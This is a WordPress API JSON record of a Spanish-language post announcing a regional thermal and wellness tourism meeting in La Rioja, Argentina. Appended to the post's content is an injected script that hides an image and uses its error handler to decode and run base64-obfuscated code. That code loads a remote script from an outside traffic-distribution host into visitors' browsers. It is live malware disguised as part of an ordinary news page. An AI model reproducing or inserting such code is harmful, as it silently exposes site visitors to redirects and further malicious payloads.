{"id":5335,"date":"2022-06-01T12:06:47","date_gmt":"2022-06-01T15:06:47","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=5335"},"modified":"2025-08-13T16:19:14","modified_gmt":"2025-08-13T19:19:14","slug":"encuentro-regional-de-termalismo-y-turismo-de-bienestar","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=5335","title":{"rendered":"Encuentro Regional de Termalismo y Turismo de Bienestar"},"content":{"rendered":"\n<h5 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#032d46\">La Rioja ser\u00e1 sede por primera vez de este importante evento donde reconocidos disertantes har\u00e1n referencia a las bondades y su potencial tur\u00edstico que representan las aguas termales en esta regi\u00f3n del pa\u00eds.<\/h5>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"1024\" height=\"72\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1-1024x72.jpeg\" alt=\"\" class=\"wp-image-5316\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1-1024x72.jpeg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1-300x21.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1-768x54.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1-696x49.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1-1068x75.jpeg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_27-5-2022_185555_www.termatalia.com_-1.jpeg 1187w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<p>Organizado por el Gobierno de la Provincia a trav\u00e9s del Ministerio de Turismo y Culturas el encuentro se desarrollar\u00e1 del 9 al 11 de junio. Los primeros dos d\u00edas en el Paseo Cultural Castro Barros y el \u00faltimo desde la localidad de Santa Teresita en el departamento de Arauco.<\/p>\n\n\n\n<p>El mismo est\u00e1 destinado a agentes de turismo p\u00fablicos y privados, estudiantes, profesionales de la salud y p\u00fablico en general.<\/p>\n\n\n\n<p>Los interesados podr\u00e1n inscribirse online&nbsp;<img decoding=\"async\" height=\"16\" width=\"16\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/ta8\/1.5\/16\/1f447.png\" alt=\"\ud83d\udc47\"><br><a href=\"https:\/\/l.facebook.com\/l.php?u=https%3A%2F%2Fdocs.google.com%2Fforms%2Fd%2F1cbYrn1sAmAQMLSOkyCZQZPe7CRUIBZ9UD1zFJMrNDS0%2Fedit%3Ffbclid%3DIwAR2Z48Mrlb8hMqPzJ-i8OouQmPJCvog0deDP7kiK4bm6bQN6JqNXHSIurdM&amp;h=AT3Eyzum62pU9fVriCdx6Isac2kD_4eP4Ts0jN42Poiy8EB2WzMQaoHwlNFIm8eM6ZI0vb3LzyzB3e2vFrx1MDBN1CDINInC1iclIuJIzbuPC8UvA2M-MshGs6GwnjGzKlrb07sCv8x1TheCUVs4&amp;__tn__=-UK*F\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/docs.google.com\/&#8230;\/1cbYrn1sAmAQMLSOkyCZQZPe&#8230;\/edit<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.facebook.com\/MinTurismoyCulturasLaRioja?__tn__=-UC*F\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_1-6-2022_12238_www.facebook.com_.jpeg\" alt=\"\" class=\"wp-image-5336\" width=\"124\" height=\"98\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_1-6-2022_12238_www.facebook.com_.jpeg 726w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_1-6-2022_12238_www.facebook.com_-300x238.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_1-6-2022_12238_www.facebook.com_-696x551.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2022\/06\/Captura-web_1-6-2022_12238_www.facebook.com_-530x420.jpeg 530w\" sizes=\"(max-width: 124px) 100vw, 124px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Rioja ser\u00e1 sede por primera vez de este importante evento donde reconocidos disertantes har\u00e1n referencia a las bondades y su potencial tur\u00edstico que representan las aguas termales en esta regi\u00f3n del pa\u00eds. Organizado por el Gobierno de la Provincia a trav\u00e9s del Ministerio de Turismo y Culturas el encuentro se desarrollar\u00e1 del 9 al [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5337,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[10,17],"tags":[],"class_list":["post-5335","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cuyo","category-turismo-termal"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5335","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5335"}],"version-history":[{"count":4,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5335\/revisions"}],"predecessor-version":[{"id":10664,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5335\/revisions\/10664"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5337"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5335"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5335"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5335"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}